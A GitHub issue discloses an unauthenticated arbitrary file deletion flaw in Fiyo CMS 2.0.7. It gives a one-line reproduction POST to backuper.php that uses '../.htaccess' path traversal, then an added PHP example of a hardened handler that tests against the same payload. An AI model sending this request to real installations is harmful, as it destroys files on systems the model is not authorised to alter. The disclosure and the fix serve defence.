An any-file-delete vulnerability #2

Open
jgj212 opened this issue Apr 17, 2017 · 1 comment

jgj212 commented Apr 17, 2017

I found that Fiyo CMS version 2.0.7 has an any-file-delete vulnerability that does not need login.

There is no checking of $_POST['act'] and $_POST[file]; the client can control these two inputs to cause deletion of any file.

Reproduce (this will delete the .htaccess file):
Url: http://localhost/dapur/apps/app_config/controller/backuper.php
POST: type=delete&act=db&file=../.htaccess
Referrer: http://localhost

Discoverer: ADLab of VenusTech.
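
A hardened form of the delete handler the report describes, as an added example that is not part of the original issue and is not Fiyo CMS code. The directory layout, the `is_admin` session key, the allowed extensions and the function names are assumptions; the point is that `act` goes through an allow-list, `file` must be a bare file name whose canonical path stays inside the backup directory, and the request is rejected without an authenticated session.

```php
<?php
declare(strict_types=1);

// Added example, not Fiyo CMS code. Directory layout, the session key and the
// allowed extensions are assumptions made for illustration.
const BACKUP_DIRS = ['db' => __DIR__ . '/backup/db'];   // allow-list for `act`

// Map a client-supplied name to a file directly inside $baseDir, or null.
function resolveBackupPath(string $baseDir, string $name): ?string
{
    // Bare file name only: rejects "../.htaccess", absolute paths, NUL bytes.
    if ($name !== basename($name)
        || !preg_match('/\A[A-Za-z0-9._-]+\.(sql|zip)\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false) {
        return null;                        // directory or file does not exist
    }
    // Compare canonical paths so a symlink cannot point outside the directory.
    return (dirname($path) === $base && is_file($path)) ? $path : null;
}

// Returns an HTTP status code for a delete request.
function handleDelete(array $post, array $session): int
{
    if (empty($session['is_admin'])) {      // hypothetical session flag
        return 403;                         // no unauthenticated deletes
    }
    $act  = $post['act']  ?? null;
    $file = $post['file'] ?? null;
    if (!is_string($act) || !is_string($file)
        || !array_key_exists($act, BACKUP_DIRS)) {
        return 400;
    }
    $path = resolveBackupPath(BACKUP_DIRS[$act], $file);
    if ($path === null) {
        return 400;
    }
    return unlink($path) ? 200 : 500;
}

// Constructed requests: the first two mirror the reported POST body.
if (PHP_SAPI === 'cli') {
    $admin = ['is_admin' => true];
    var_dump(handleDelete(['act' => 'db', 'file' => '../.htaccess'], []));
    var_dump(handleDelete(['act' => 'db', 'file' => '../.htaccess'], $admin));
    var_dump(handleDelete(['act' => '../..', 'file' => 'x.sql'], $admin));
}
```
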

firstryan commented Jul 18, 2017 via email
